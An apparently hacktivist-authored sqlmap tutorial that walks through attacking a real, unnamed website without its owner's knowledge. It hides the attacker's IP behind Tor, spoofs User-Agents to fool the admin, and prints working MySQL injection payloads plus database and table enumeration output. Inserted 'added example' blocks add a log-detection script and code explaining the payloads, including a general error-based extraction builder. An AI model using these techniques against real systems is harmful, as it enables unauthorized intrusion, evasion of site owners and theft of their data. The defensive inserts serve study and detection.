Sqlmap Tutorial -- by gh0st

Big shout out to my brothers at irc.anonops.li #antisec, especially DaMau55, Theory, and Storm -> what up guys!

WHO LOVES SQL INJECTION? Okay, here we go...

First of all, what is sqlmap? Sqlmap is a script written in Python that will save you a lot of time when it comes to SQL injection attacks, and it has some amazing features. Since sqlmap is written in Python it is very portable, meaning it will run on any operating system that has a Python interpreter: in layman's terms, Windows, Linux and the Unix-based operating systems.

Some of the features available are:
1) takeover options
2) bruteforcing -> for tables/columns
3) database fingerprinting
4) Google dork search options
5) command execution
6) operating system shell option
7) proxy options
8) enumeration options
9) password cracking options
10) and so much more...

First let's get a printout of the sqlmap.py -h (help) output:

    sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

Usage: python ./sqlmap.py [options]

Options:
  --version             show program's version number and exit
  -h, --help            show this help message and exit
  -v VERBOSE            Verbosity level: 0-6 (default 1)

  Target:
    At least one of these options has to be specified to set the source to get target urls from.

    -d DIRECT           Direct connection to the database
    -u URL, --url=URL   Target url
    -l LOGFILE          Parse targets from Burp or WebScarab proxy logs
    -m BULKFILE         Scan multiple targets enlisted in a given textual file
    -r REQUESTFILE      Load HTTP request from a file
    -g GOOGLEDORK       Process Google dork results as target urls
    -c CONFIGFILE       Load options from a configuration INI file

  Request:
    These options can be used to specify how to connect to the target url.
    --data=DATA         Data string to be sent through POST
    --cookie=COOKIE     HTTP Cookie header
    --cookie-urlencode  URL Encode generated cookie injections
    --drop-set-cookie   Ignore Set-Cookie header from response
    --user-agent=AGENT  HTTP User-Agent header
    --random-agent      Use randomly selected HTTP User-Agent header
    --referer=REFERER   HTTP Referer header
    --headers=HEADERS   Extra HTTP headers newline separated
    --auth-type=ATYPE   HTTP authentication type (Basic, Digest or NTLM)
    --auth-cred=ACRED   HTTP authentication credentials (name:password)
    --auth-cert=ACERT   HTTP authentication certificate (key_file,cert_file)
    --proxy=PROXY       Use a HTTP proxy to connect to the target url
    --proxy-cred=PCRED  HTTP proxy authentication credentials (name:password)
    --ignore-proxy      Ignore system default HTTP proxy
    --delay=DELAY       Delay in seconds between each HTTP request
    --timeout=TIMEOUT   Seconds to wait before timeout connection (default 30)
    --retries=RETRIES   Retries when the connection timeouts (default 3)
    --scope=SCOPE       Regexp to filter targets from provided proxy log
    --safe-url=SAFURL   Url address to visit frequently during testing
    --safe-freq=SAFREQ  Test requests between two visits to a given safe url

  Optimization:
    These options can be used to optimize the performance of sqlmap.

    -o                  Turn on all optimization switches
    --predict-output    Predict common queries output
    --keep-alive        Use persistent HTTP(s) connections
    --null-connection   Retrieve page length without actual HTTP response body
    --threads=THREADS   Max number of concurrent HTTP(s) requests (default 1)

  Injection:
    These options can be used to specify which parameters to test for, provide custom injection payloads and optional tampering scripts.
    -p TESTPARAMETER    Testable parameter(s)
    --dbms=DBMS         Force back-end DBMS to this value
    --os=OS             Force back-end DBMS operating system to this value
    --prefix=PREFIX     Injection payload prefix string
    --suffix=SUFFIX     Injection payload suffix string
    --tamper=TAMPER     Use given script(s) for tampering injection data

  Detection:
    These options can be used to specify how to parse and compare page content from HTTP responses when using blind SQL injection technique.

    --level=LEVEL       Level of tests to perform (1-5, default 1)
    --risk=RISK         Risk of tests to perform (0-3, default 1)
    --string=STRING     String to match in page when the query is valid
    --regexp=REGEXP     Regexp to match in page when the query is valid
    --text-only         Compare pages based only on the textual content

  Techniques:
    These options can be used to tweak testing of specific SQL injection techniques.

    --technique=TECH    SQL injection techniques to test for (default BEUST)
    --time-sec=TIMESEC  Seconds to delay the DBMS response (default 5)
    --union-cols=UCOLS  Range of columns to test for UNION query SQL injection
    --union-char=UCHAR  Character to use for bruteforcing number of columns

  Fingerprint:
    -f, --fingerprint   Perform an extensive DBMS version fingerprint

  Enumeration:
    These options can be used to enumerate the back-end database management system information, structure and data contained in the tables. Moreover you can run your own SQL statements.
    -b, --banner        Retrieve DBMS banner
    --current-user      Retrieve DBMS current user
    --current-db        Retrieve DBMS current database
    --is-dba            Detect if the DBMS current user is DBA
    --users             Enumerate DBMS users
    --passwords         Enumerate DBMS users password hashes
    --privileges        Enumerate DBMS users privileges
    --roles             Enumerate DBMS users roles
    --dbs               Enumerate DBMS databases
    --tables            Enumerate DBMS database tables
    --columns           Enumerate DBMS database table columns
    --schema            Enumerate DBMS schema
    --count             Retrieve number of entries for table(s)
    --dump              Dump DBMS database table entries
    --dump-all          Dump all DBMS databases tables entries
    --search            Search column(s), table(s) and/or database name(s)
    -D DB               DBMS database to enumerate
    -T TBL              DBMS database table to enumerate
    -C COL              DBMS database table column to enumerate
    -U USER             DBMS user to enumerate
    --exclude-sysdbs    Exclude DBMS system databases when enumerating tables
    --start=LIMITSTART  First query output entry to retrieve
    --stop=LIMITSTOP    Last query output entry to retrieve
    --first=FIRSTCHAR   First query output word character to retrieve
    --last=LASTCHAR     Last query output word character to retrieve
    --sql-query=QUERY   SQL statement to be executed
    --sql-shell         Prompt for an interactive SQL shell

  Brute force:
    These options can be used to run brute force checks.

    --common-tables     Check existence of common tables
    --common-columns    Check existence of common columns

  User-defined function injection:
    These options can be used to create custom user-defined functions.

    --udf-inject        Inject custom user-defined functions
    --shared-lib=SHLIB  Local path of the shared library

  File system access:
    These options can be used to access the back-end database management system underlying file system.
    --file-read=RFILE   Read a file from the back-end DBMS file system
    --file-write=WFILE  Write a local file on the back-end DBMS file system
    --file-dest=DFILE   Back-end DBMS absolute filepath to write to

  Operating system access:
    These options can be used to access the back-end database management system underlying operating system.

    --os-cmd=OSCMD      Execute an operating system command
    --os-shell          Prompt for an interactive operating system shell
    --os-pwn            Prompt for an out-of-band shell, meterpreter or VNC
    --os-smbrelay       One click prompt for an OOB shell, meterpreter or VNC
    --os-bof            Stored procedure buffer overflow exploitation
    --priv-esc          Database process' user privilege escalation
    --msf-path=MSFPATH  Local path where Metasploit Framework 3 is installed
    --tmp-path=TMPPATH  Remote absolute path of temporary files directory

  Windows registry access:
    These options can be used to access the back-end database management system Windows registry.

    --reg-read          Read a Windows registry key value
    --reg-add           Write a Windows registry key value data
    --reg-del           Delete a Windows registry key value
    --reg-key=REGKEY    Windows registry key
    --reg-value=REGVAL  Windows registry key value
    --reg-data=REGDATA  Windows registry key value data
    --reg-type=REGTYPE  Windows registry key value type

  General:
    These options can be used to set some general working parameters.
    -s SESSIONFILE      Save and resume all data retrieved on a session file
    -t TRAFFICFILE      Log all HTTP traffic into a textual file
    --batch             Never ask for user input, use the default behaviour
    --charset=CHARSET   Force character encoding used for data retrieval
    --eta               Display for each output the estimated time of arrival
    --flush-session     Flush session file for current target
    --fresh-queries     Ignores query results stored in session file
    --save              Save options on a configuration INI file
    --update            Update sqlmap

  Miscellaneous:
    --beep              Alert when sql injection found
    --check-payload     IDS detection testing of injection payloads
    --cleanup           Clean up the DBMS by sqlmap specific UDF and tables
    --forms             Parse and test forms on target url
    --gpage=GOOGLEPAGE  Use Google dork results from specified page number
    --mobile            Imitate smartphone through HTTP User-Agent header
    --page-rank         Display page rank (PR) for Google dork results
    --parse-errors      Parse DBMS error messages from response pages
    --replicate         Replicate dumped data into a sqlite3 database
    --tor               Use default Tor (Vidalia/Privoxy/Polipo) proxy address
    --wizard            Simple wizard interface for beginner users

So many options, right? Sqlmap can even be tied in with Metasploit, which I will try to cover another time. For now I am going to go over some of my favorite options; this is really just a quick start to get you familiar with sqlmap and how to start using it right away.

Okay, so what can we do with this great script? I will show you...

The first option we will discuss is the proxy option (--proxy). Sqlmap is able to connect to its target web server through a proxy, which is what you want when the target should not see your real IP address. Sqlmap even comes with the (--tor) option: if you have Tor running on your system, --tor makes sqlmap use the default Privoxy/Polipo proxy address that sits in front of Tor, so your requests reach the target through the Tor network.
I have written a very detailed tutorial on how to install/set up Tor on your Linux system; if you have not read it, I would suggest you check it out here:
Tor Tutorial written by gh0st: http://pastebin.com/XhTx8n3b

Okay, let's continue... For this tutorial the proxy we will be using is Polipo, sitting in front of Tor. This is the syntax to have sqlmap connect to the target web server through a proxy:

root@bt# python sqlmap.py --proxy="http://127.0.0.1:8118"

If you are not familiar with Python scripts: you put the word "python" in front of the script (just like with perl), or you can use ./ to run the script directly:

root@bt# ./sqlmap.py --proxy="http://127.0.0.1:8118"

Notice that 127.0.0.1 is localhost, which is where we are running Polipo, and 8118 is the port Polipo is listening on. We can verify this with the following Linux command:

root@bt:~# netstat -ntl
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 127.0.0.1:8118          0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.1:9050          0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.1:7175          0.0.0.0:*               LISTEN
tcp6       0      0 ::1:7175                :::*                    LISTEN

(8118 is Polipo; 9050 is Tor's SOCKS port, which Polipo forwards to.) Now sqlmap is connecting to our target web server through the proxy, so the target only ever sees the Tor exit node's address and not ours. Keep in mind this only holds for traffic that actually goes through the proxy: anything you run against the same host outside sqlmap without it (a browser, nmap, a manual curl) still comes straight from your own IP.

Another great trick is to make the admin of the target web server think that the connections/probing from sqlmap are just different people visiting his website. I will explain... I know this will not be new information for some of you, but for others it will be valuable.

When you connect to a web server, let's say http://www.abc.com, and the admin is security conscious and reviews his web logs, a person who is just visiting his website is making a connection to port 80, which is where a web server such as Apache is listening. So when he looks at his logs he sees something like this:

"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.10) Gecko/2121120043 Firefox/3.6.10"

That is the User-Agent that shows up in the log, with an IP address attached to it, for a plain connection from a Firefox web browser. As you browse through the site, different things show up in the log as well (the GET and POST requests, etc.). We can trick the web admin into thinking that our probing and scanning from sqlmap is just a web browser browsing his website. Here is how: one of my favorite options in sqlmap, --user-agent. It looks like this:

--user-agent="Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.10) Gecko/2121120043 Firefox/3.6.10"

With that, every request sqlmap sends carries a Firefox User-Agent. But instead of typing all that out, we can just use the --random-agent option.

--random-agent -> this picks a random User-Agent (from sqlmap's txt/user-agents.txt) for the run, so each time we start sqlmap the admin sees a different browser (you can see the one it picked in the "fetched random HTTP User-Agent header" line at the start of every run below). Combined with Tor, whose exit node changes over time, the requests don't all share one source address either. How great is that!

One caveat: the User-Agent header only changes what the client looks like. The injection payloads (AND 8517=8517, SLEEP(5), CONCAT(CHAR(...)) and so on) still end up in the query string, and therefore in the access log, for anybody who reads it.

So let's put it all together now...

root@bt# python sqlmap.py --proxy="http://127.0.0.1:8118" --random-agent

So far we are hiding our IP address and sending a random User-Agent with our requests to the target. Feels good, don't it? Now let's get to the fun stuff: let's find a target!

Before I show the next steps, know that sqlmap.py has the -g option for Google dorks: given the right dork syntax, sqlmap will query Google and use the results as targets.

Okay, we have a target, let's get started... All we need to do to give sqlmap a target is:

root@bt# python sqlmap.py -u "target.com/news.php?id=11"

So the syntax is -u "targetsitegoeshere.com". Now let's put it all together with our other options...
root@bt:/pentest/database/sqlmap# python sqlmap.py --proxy="http://127.0.0.1:8118" --random-agent -u "http://www.indexHIDEN.com/info.php?id=6"

    sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 18:37:16

[18:37:16] [INFO] fetched random HTTP User-Agent header from file '/pentest/database/sqlmap/txt/user-agents.txt': Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_2_1 like Mac OS X; da-dk) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5
[18:37:16] [INFO] using '/pentest/database/sqlmap/output/www.indexHIDEN.com/session' as session file
[18:37:17] [INFO] testing connection to the target url
[18:37:21] [INFO] testing if the url is stable, wait a few seconds
[18:37:22] [INFO] url is stable
[18:37:22] [INFO] testing if GET parameter 'id' is dynamic
[18:37:23] [INFO] confirming that GET parameter 'id' is dynamic
[18:37:24] [INFO] GET parameter 'id' is dynamic
[18:37:25] [INFO] heuristic test shows that GET parameter 'id' might be injectable (possible DBMS: MySQL)
[18:37:25] [INFO] testing sql injection on GET parameter 'id'
[18:37:25] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:37:28] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[18:37:28] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[18:37:29] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[18:37:29] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[18:37:29] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[18:38:11] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable
[18:38:11] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:38:17] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N] N
sqlmap identified the following injection points with a total of 29 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=6 AND 8517=8517

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=6 AND (SELECT 1834 FROM(SELECT COUNT(*),CONCAT(CHAR(58,110,111,114,58),(SELECT (CASE WHEN (1834=1834) THEN 1 ELSE 0 END)),CHAR(58,103,97,109,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=6 AND SLEEP(5)
---
[18:44:56] [INFO] manual usage of GET payloads requires url encoding
[18:44:56] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0
[18:44:56] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/www.indexHIDEN.com'

[*] shutting down at: 18:44:56

Okay, now look above. All we did was use the following options, broken down:

--proxy="http://127.0.0.1:8118" -> Polipo/Tor proxy
--random-agent -> make it look like a web browser
-u "target.com/info.php?id=6" -> target

So you know, I am going to hide the real website that I used because I feel it just wouldn't be right to post this information, especially without them knowing...

This is the line you should take notice of from above:

GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N] N

The site is vulnerable to SQL injection: sqlmap confirmed three different techniques against the id parameter (boolean-based blind, error-based and time-based blind), each with the exact payload it used, and we answered N to the prompt.
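What that run looks like from the other side, as an added example that is not part of this tutorial: a few Apache access-log lines constructed to resemble the requests above (made-up IPs, the payloads from sqlmap's report, and a different User-Agent per line as separate --random-agent runs would give), plus a small log review that flags the sqlmap requests by their payloads no matter what User-Agent they carry. The log format, the hostless paths and the detection patterns are assumptions for the example; none of it is sqlmap's code.

```python
"""Added example (not part of the tutorial, not sqlmap's code): what the
"security conscious admin" sees in his access log when sqlmap runs with
--random-agent. The lines below are constructed Apache "combined" entries
for the tutorial's info.php?id=6 target; IPs and User-Agents are made up."""
import re
from urllib.parse import unquote_plus

# Constructed sample log: three lines carry sqlmap-style payloads taken from
# the injection report above, each under a different User-Agent.
SAMPLE_LOG = r"""
10.0.0.5 - - [12/Sep/2011:18:37:17 +0000] "GET /info.php?id=6 HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_2_1 like Mac OS X) AppleWebKit/533.17.9"
10.0.0.5 - - [12/Sep/2011:18:37:28 +0000] "GET /info.php?id=6%20AND%208517%3D8517 HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9b5) Gecko/2008041514 Firefox/3.0b5"
10.0.0.5 - - [12/Sep/2011:18:38:11 +0000] "GET /info.php?id=6%20AND%20SLEEP%285%29 HTTP/1.1" 200 5120 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322)"
10.0.0.9 - - [12/Sep/2011:18:40:02 +0000] "GET /info.php?id=7 HTTP/1.1" 200 4980 "-" "Opera/9.22 (Windows NT 5.1; U; SV1; ru)"
10.0.0.5 - - [12/Sep/2011:18:45:20 +0000] "GET /info.php?id=6%20AND%20%28SELECT%201834%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%28CHAR%2858%2C110%2C111%2C114%2C58%29%2C%28SELECT%20%28CASE%20WHEN%20%281834%3D1834%29%20THEN%201%20ELSE%200%20END%29%29%2CCHAR%2858%2C103%2C97%2C109%2C58%29%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 HTTP/1.1" 500 312 "-" "Mozilla/5.0 (X11; U; Linux i686; fr-be; rv:1.9.0.8) Gecko/2009073022 Ubuntu/9.04 (jaunty) Firefox/3.0.13"
""".strip()

# Apache combined log format: ip ident user [ts] "method path proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')

# Patterns that betray sqlmap-style probing regardless of the User-Agent.
# They are matched against the URL-decoded query string.
PAYLOAD_RE = re.compile(
    r"(\bAND\b\s+\d+\s*=\s*\d+)"          # boolean-based blind: AND 8517=8517
    r"|(\bSLEEP\s*\(\s*\d+\s*\))"          # time-based blind: SLEEP(5)
    r"|(\bCONCAT\s*\(\s*CHAR\s*\()"        # error-based marker construction
    r"|(\bINFORMATION_SCHEMA\b)"           # schema enumeration
    r"|(\bUNION\b.{0,40}\bSELECT\b)",      # UNION query
    re.IGNORECASE | re.DOTALL)

def parse_line(line):
    """Split one combined-format line into its fields; query is URL-decoded."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    path, _, query = rec["path"].partition("?")
    rec["path"], rec["query"] = path, unquote_plus(query)
    return rec

def suspicious_requests(log_text):
    """Return (ip, decoded query, user-agent) for every line carrying a payload."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and PAYLOAD_RE.search(rec["query"]):
            hits.append((rec["ip"], rec["query"], rec["ua"]))
    return hits

if __name__ == "__main__":
    for ip, query, ua in suspicious_requests(SAMPLE_LOG):
        print(f"{ip}  {query[:50]!r}  UA={ua[:28]}...")
```

Three of the five constructed lines are flagged, all from the same source address, each with a different User-Agent: the browser string never entered into it.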
For this prompt you can almost always choose N. "The others" means the other parameters of the request (if any): sqlmap has already found an injectable parameter and has fingerprinted the back end as MySQL, so continuing would only spend more requests on whatever other parameters the URL has. Here the only parameter is id, so there is nothing else to test. MOVING ON!

Our current command line:

root@bt:/pentest/database/sqlmap# python sqlmap.py --proxy="http://127.0.0.1:8118" --random-agent -u "http://www.indexHIDEN.com/info.php?id=6"

The next thing we are going to add to our command line is the --dbs option:

--dbs -> Enumerate DBMS databases (DBMS = database management system)

This option makes sqlmap enumerate the databases on the back-end server (on MySQL >= 5.0 it reads them from information_schema.SCHEMATA). How great is this! Here we go...

root@bt:/pentest/database/sqlmap# python sqlmap.py --proxy="http://127.0.0.1:8118" --random-agent -u "http://www.indexHIDEN.com/info.php?id=6" --dbs

[banner and legal disclaimer as above]
[*] starting at: 18:45:17

[18:45:17] [INFO] fetched random HTTP User-Agent header from file '/pentest/database/sqlmap/txt/user-agents.txt': Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9b5) Gecko/2008041514 Firefox/3.0b5
[18:45:17] [INFO] using '/pentest/database/sqlmap/output/www.indexHIDEN.com/session' as session file
[18:45:17] [INFO] resuming injection data from session file
[18:45:17] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[18:45:18] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
[injection points as above]
[18:45:19] [INFO] manual usage of GET payloads requires url encoding
[18:45:19] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0
[18:45:19] [INFO] fetching database names
[18:45:20] [INFO] the SQL query used returns 26 entries
[18:45:20] [INFO] suppressing possible resume console info because of large number of rows (might take too much time)
[18:45:21] [INFO] retrieved: testpiotr
[18:45:22] [INFO] retrieved: test
[18:45:22] [INFO] retrieved: sma
[18:45:23] [INFO] retrieved: sale
[18:45:24] [INFO] retrieved: rk2009
[18:45:25] [INFO] retrieved: rk
[18:45:25] [INFO] retrieved: pathologistsmeetclinicians
[18:45:26] [INFO] retrieved: ncp
[18:45:27] [INFO] retrieved: mysql
[18:45:28] [INFO] retrieved: mydb
[18:45:29] [INFO] retrieved: lowers
[18:45:29] [INFO] retrieved: limesurvey
[18:45:30] [INFO] retrieved: lemon8xml
[18:45:32] [INFO] retrieved: idaho_test_usun
[18:45:33] [INFO] retrieved: ici_corporate
[18:45:34] [INFO] retrieved: grants
[18:45:35] [INFO] retrieved: fored2010
[18:45:36] [INFO] retrieved: egroupware
[18:45:36] [INFO] retrieved: db_test
[18:45:37] [INFO] retrieved: bugtracker
[18:45:38] [INFO] retrieved: blogic
[18:45:39] [INFO] retrieved: avea
[18:45:40] [INFO] retrieved: IC2
[18:45:41] [INFO] retrieved: information_schema
available databases [26]:
[*] avea
[*] blogic
[*] bugtracker
[*] db_test
[*] egroupware
[*] fored2010
[*] grants
[*] IC2
[*] ici_corporate
[*] idaho_test_usun
[*] information_schema
[*] lemon8xml
[*] limesurvey
[*] lowers
[*] mydb
[*] mysql
[*] ncp
[*] pathologistsmeetclinicians
[*] rk
[*] rk2009
[*] sale
[*] sma
[*] test
[*] testpiotr

[18:45:41] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/www.indexHIDEN.com'

[*] shutting down at: 18:45:41

WOW!!! Sqlmap has found 26 databases! (A couple of the databases have been removed from the listing above to hide the identity of the website. Forgive me =-P)

Notice what is already visible at this point: the web application's database account can see the mysql database (MySQL's own privilege tables) and every other application's schema on this server. A properly scoped account would only see its own database and information_schema.

Okay, well, what now? Next we need to do a little digging to find some good tables and columns so we can exploit this website. Let's start with the database [*] mydb. To see what is in the database (mydb) we add these options to our command line:

-D mydb -> this tells sqlmap to use the database mydb (the -D option is for the database)
--tables -> this tells sqlmap to list the tables in the (mydb) database

NOTE: because the database [*] information_schema is available (MySQL >= 5.0), sqlmap can read the names of databases, tables and columns straight out of it. If information_schema is not available (MySQL < 5.0, for example), sqlmap has to guess instead: the --common-tables and --common-columns options check its wordlists of common table and column names one by one. That works, but every guess costs at least one request, so it can take a while. MOVING ON!
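How the payloads in sqlmap's injection report actually work, as an added example in Python that is not part of this tutorial and not sqlmap's code. Part 1 is a stand-in for the vulnerable info.php backed by SQLite with a constructed table (the table info, its title column and its rows are assumptions), showing what the boolean-based blind probe id=6 AND 8517=8517 relies on and why a parameterized query does not react to it. Part 2 takes the error-based payload apart: it pulls its rows from INFORMATION_SCHEMA.CHARACTER_SETS for the same reason as the note above (on MySQL >= 5.0 that schema is always there and always has a few rows); the two CHAR() calls build the markers :nor: and :gam:, the subquery between them is the value being extracted (here only CASE WHEN 1834=1834, a confirmation test), and FLOOR(RAND(0)*2) under GROUP BY provokes a duplicate-key error whose message echoes the whole concatenated string, value included, back into the error page. The error text in the block is constructed in the shape MySQL emits.

```python
"""Added example, not from the tutorial and not sqlmap's code: the two kinds
of payload in the injection report, worked by hand. Part 1 uses an in-memory
SQLite table with constructed rows as a stand-in for info.php; part 2 decodes
the error-based payload and reads the leaked value out of a constructed
duplicate-key error message."""
import re
import sqlite3

# ---- Part 1: boolean-based blind --------------------------------------------

def make_db():
    """Constructed data standing in for whatever info.php?id=N reads."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE info (id INTEGER NOT NULL, title TEXT)")
    con.executemany("INSERT INTO info VALUES (?, ?)",
                    [(5, "five"), (6, "six"), (7, "seven")])
    return con

def lookup_vulnerable(con, id_param):
    """The broken pattern: the raw GET parameter is pasted into the SQL text."""
    return [r[0] for r in con.execute("SELECT title FROM info WHERE id=" + id_param)]

def lookup_safe(con, id_param):
    """Same query with a bound parameter: the input can only ever be a value."""
    return [r[0] for r in con.execute("SELECT title FROM info WHERE id=?", (id_param,))]

def boolean_blind_differs(lookup, con, base="6"):
    """sqlmap's boolean-based test in miniature: one always-true and one
    always-false condition; if the two responses differ, the database
    evaluated the condition. The true payload is the one from the report."""
    return lookup(con, base + " AND 8517=8517") != lookup(con, base + " AND 8517=8518")

# ---- Part 2: error-based ----------------------------------------------------

# The error-based payload from the injection report, verbatim.
PAYLOAD = ("6 AND (SELECT 1834 FROM(SELECT COUNT(*),CONCAT(CHAR(58,110,111,114,58),"
           "(SELECT (CASE WHEN (1834=1834) THEN 1 ELSE 0 END)),CHAR(58,103,97,109,58),"
           "FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)")

CHAR_RE = re.compile(r"CHAR\(((?:\d+\s*,\s*)*\d+)\)")

def _char_to_str(arglist):
    return "".join(chr(int(n)) for n in arglist.split(","))

def decode_char_calls(sql):
    """Rewrite every MySQL CHAR(n,n,...) as the quoted string it builds."""
    return CHAR_RE.sub(lambda m: "'" + _char_to_str(m.group(1)) + "'", sql)

def marker_pair(sql):
    """The (prefix, suffix) markers sqlmap wraps the extracted value in."""
    markers = [_char_to_str(a) for a in CHAR_RE.findall(sql)]
    return markers[0], markers[1]

def build_error_payload(inner_query, prefix=":nor:", suffix=":gam:"):
    """General form of the trick: any scalar subquery goes between the markers;
    FLOOR(RAND(0)*2) under GROUP BY makes MySQL raise a duplicate-key error
    whose message echoes the concatenated string (and so the value) back."""
    def char_of(s):
        return "CHAR(" + ",".join(str(ord(c)) for c in s) + ")"
    return ("AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(%s,(%s),%s,FLOOR(RAND(0)*2))x "
            "FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
            % (char_of(prefix), inner_query, char_of(suffix)))

def extract_from_error(error_text, prefix, suffix):
    """Pull the leaked value out of the error page text."""
    m = re.search(re.escape(prefix) + r"(.*?)" + re.escape(suffix), error_text)
    return m.group(1) if m else None

# Constructed error text in the shape MySQL produces for this payload; the "1"
# between the markers is what CASE WHEN (1834=1834) THEN 1 evaluates to.
SAMPLE_ERROR = "Duplicate entry ':nor:1:gam:1' for key 'group_key'"

if __name__ == "__main__":
    con = make_db()
    print("string-built query reacts to blind probe:", boolean_blind_differs(lookup_vulnerable, con))
    print("parameterized query reacts:", boolean_blind_differs(lookup_safe, con))
    print(decode_char_calls(PAYLOAD))
    print("leaked value:", extract_from_error(SAMPLE_ERROR, *marker_pair(PAYLOAD)))
```

Swap the CASE expression for something like (SELECT database()) in build_error_payload and the same duplicate-key message carries the database name instead of a 1; that substitution, repeated per column and row, is what the --dbs, --tables and --dump runs below are doing.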
root@bt:/pentest/database/sqlmap# python sqlmap.py --proxy="http://127.0.0.1:8118" --random-agent -u "http://www.indexHIDEN.com/info.php?id=6" --tables -D mydb

[banner and legal disclaimer as above]

[*] starting at: 18:46:51

[18:46:51] [INFO] fetched random HTTP User-Agent header from file '/pentest/database/sqlmap/txt/user-agents.txt': Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322)
[18:46:51] [INFO] using '/pentest/database/sqlmap/output/www.indexHIDEN.com/session' as session file
[18:46:51] [INFO] resuming injection data from session file
[18:46:51] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[18:46:51] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
[injection points as above]
[18:46:52] [INFO] manual usage of GET payloads requires url encoding
[18:46:52] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0
[18:46:52] [INFO] fetching tables for database: mydb
[18:46:54] [INFO] the SQL query used returns 2 entries
[18:46:54] [INFO] retrieved: mydb
[18:46:55] [INFO] retrieved: WORKER
[18:46:56] [INFO] retrieved: mydb
[18:46:57] [INFO] retrieved: COMPANY
Database: mydb
[2 tables]
+---------+
| COMPANY |
| WORKER  |
+---------+

[18:46:57] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/www.indexHIDEN.com'

[*] shutting down at: 18:46:57

Okay, as you can hopefully see, there are only 2 tables in the database mydb, and there is nothing sexy or useful here, so we will move on...

NOTE: one thing I would like you to notice is that sqlmap.py logs all information and sessions to the following directory under BackTrack Linux:

sqlmap logs output to directory -> /pentest/database/sqlmap/output/www.targetwebsite.com

Everything that was retrieved ends up in that directory, together with the session file that lets later runs pick up where the last one stopped without re-testing the target (that is what the "resuming injection data from session file" lines above mean, and why these runs show "a total of 0 HTTP(s) requests" for the detection phase). This is very important!! MOVING ON!!

We need to pick another database to enumerate, so I will try the database (mysql):

root@bt:/pentest/database/sqlmap# python sqlmap.py --proxy="http://127.0.0.1:8118" --random-agent -u "http://www.indexHIDEN.com/info.php?id=6" --tables -D mysql

[banner and legal disclaimer as above]
[*] starting at: 18:47:55

[18:47:55] [INFO] fetched random HTTP User-Agent header from file '/pentest/database/sqlmap/txt/user-agents.txt': Opera/9.22 (Windows NT 5.1; U; SV1; MEGAUPLOAD 1.0; ru)
[18:47:55] [INFO] using '/pentest/database/sqlmap/output/www.indexHIDEN.com/session' as session file
[18:47:55] [INFO] resuming injection data from session file
[18:47:55] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[18:47:55] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
[injection points as above]
